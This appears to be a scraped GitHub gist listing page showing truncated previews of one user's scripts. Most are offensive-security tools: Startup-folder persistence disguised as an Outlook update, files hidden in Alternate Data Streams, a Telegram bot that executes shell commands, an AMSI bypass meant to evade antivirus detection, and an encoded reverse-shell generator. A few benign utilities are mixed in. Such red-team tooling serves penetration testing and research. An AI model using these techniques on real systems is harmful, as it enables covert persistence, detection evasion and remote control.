Ricardo Ruiz ricardojoserf
ricardojoserf
/ persistence_startupfolder_ads.ps1
Created
February 1, 2024 20:03
Create a shortcut in Startup Folder with a custom icon. It calls a .VBS which calls a .EXE, both stored using Alternate Data Streams in a .TMP file
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $Dir = "$($env:USERPROFILE)\Appdata\Local\temp" | |
| $File = "$($env:COMPUTERNAME).tmp" | |
| $ExeFile = "calc.exe" | |
| $Url = "http://127.0.0.1:80" | |
| $IcoFile = "microsoft-outlook.ico" | |
| $SharpADS = "SharpADS.exe" | |
| $ADSexe = "ADS.exe" | |
| $ADSico = "ADS.ico" | |
| $ADSvbs = "ADS.vbs" | |
| $LnkFile = "OutlookUpdate.lnk" |
ricardojoserf
/ disable_startuppersistence.ps1
Created
January 23, 2024 15:13
Script to delete files generated to set persistence using Startup folder using the script: https://gist.github.com/ricardojoserf/d021310080ea34c8c6187d82065dde85
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $Dir="C:\ProgramData\Outlook" | |
| $ExeFile = "notmalicious.exe" | |
| $VbsFile = "CheckUpdate.vbs" | |
| $LnkFile = "Outlook.lnk" | |
| $IcoFile = "microsoft-outlook.ico" | |
| ## Unhidden and delete files from Dir | |
| cmd /c "dir /a $Dir" | |
| attrib -h $Dir\$ExeFile | |
| attrib -h $Dir\$VbsFile |
ricardojoserf
/ set_startuppersistence.ps1
Created
January 23, 2024 15:11
Script to create a .lnk file in Startup Folder with custom icon. It calls a .vbs file with a powershell encoded command which calls a .exe file
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $Url = "http://127.0.0.1:8080" | |
| $Dir="C:\ProgramData\Outlook" | |
| $ExeFile = "notmalicious.exe" | |
| $VbsFile = "CheckUpdate.vbs" | |
| $LnkFile = "Outlook.lnk" | |
| $IcoFile = "microsoft-outlook.ico" | |
| ## Create directory | |
| echo "Creating directory $Dir" | |
| mkdir $Dir |
ricardojoserf
/ AESEncrypt.go
Created
December 11, 2023 18:54
AES Encryption in Golang (small fix from original code)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Source: https://gist.githubusercontent.com/aziza-kasenova/3aea2160cbaebc5a4ba1b9219cba612e/raw/32b3801369ce669b2b1bf89ca84d24f23b487579/AES256.go | |
| package main | |
| import ( | |
| "bytes" | |
| "crypto/aes" | |
| "crypto/cipher" | |
| "encoding/base64" | |
| "fmt" |
ricardojoserf
/ smbmap_wrapper.py
Created
December 1, 2023 12:39
Wrapper for smbmap (Python 2) - Get shares in \\IP\share format
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import subprocess | |
| ip_list_file = "" | |
| user = "" | |
| domain = "" | |
| password = "" | |
| ip_list = open(ip_list_file).read().splitlines() | |
| for ip_address in ip_list: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Script to download videos hosted in Wistia by right-clicking the video and pasting the “Copy link and thumbnail” info as the 1st parameter of this script | |
| # The 2nd parameter is optional, the video name. Working at March of 2022, it downloads the video with higher quality | |
| # Syntax: | |
| # python3 wistia_downloader.py 'copied info with right click' 'file name' | |
| # Example with the video from https://wistia.com/: | |
| # python3 wistia_downloader.py '<p><a href="https://wistia.com?wvideo=vhkqhqhzyq"><img src="https://embedwistia-a.akamaihd.net/deliveries/48f1d62d1ceddb4284ad9cf67c916235.jpg?image_play_button_size=2x&image_crop_resized=960x540&image_play_button=1&image_play_button_color=fa4fa0e0" width="400" height="225" style="width: 400px; height: 225px;"></a></p><p><a href="https://wistia.com?wvideo=vhkqhqhzyq">The video hosting platform made for B2B marketers | Wistia</a></p>' "test.mp4" | |
| import requests | |
| import json | |
| import bs4 |
ricardojoserf
/ surnames.txt
Created
April 5, 2021 06:58
Lista de apellidos más comunes en España. List of surnames, most of them from Spain.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| abad | |
| abadias | |
| abascal | |
| abdel | |
| abdelkader | |
| abderrahaman | |
| abdeselam | |
| abellan | |
| abselam | |
| acosta |
ricardojoserf
/ telegram-shell.py
Created
March 24, 2021 20:31
Telegram bot to execute commands with "/cmd" and get the output
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Installation: pip3 install python-telegram-bot | |
| # Usage: /cmd COMMAND | |
| # Examples: /cmd whoami, /cmd ls -la, /cmd echo "a" > a.txt | |
| from telegram.ext import Updater, CommandHandler | |
| from telegram.ext.dispatcher import run_async | |
| import subprocess | |
| # Fill with your token after creating a bot using @BotFather | |
| token = "" |
ricardojoserf
/ amsi_bypass.ps1
Created
November 13, 2020 12:55
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Based on Rasta Mouse (@_RastaMouse)'s blogs: | |
| # - https://rastamouse.me/blog/asb-bypass-pt2/ | |
| # - https://rastamouse.me/blog/asb-bypass-pt3/ | |
| # - https://rastamouse.me/blog/asb-bypass-pt4/ | |
| # | |
| # Note: If it starts being detected change the variables names | |
| # | |
| # Usage: | |
| # . .\amsi_bypass.ps1; [TestNameSpace.test]::Disable() |
ricardojoserf
/ encoded_nishang_reverse.py
Created
November 13, 2020 12:48
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # | |
| # Based on tothi's file: https://gist.github.com/tothi/ab288fb523a4b32b51a53e542d40fe58 (I just updated the payload) | |
| # The payload is generated with Nikhil Mittal(@samratashok)'s Nishang https://github.com/samratashok/nishang | |
| # | |
| import sys | |
| import base64 | |
| def help(): |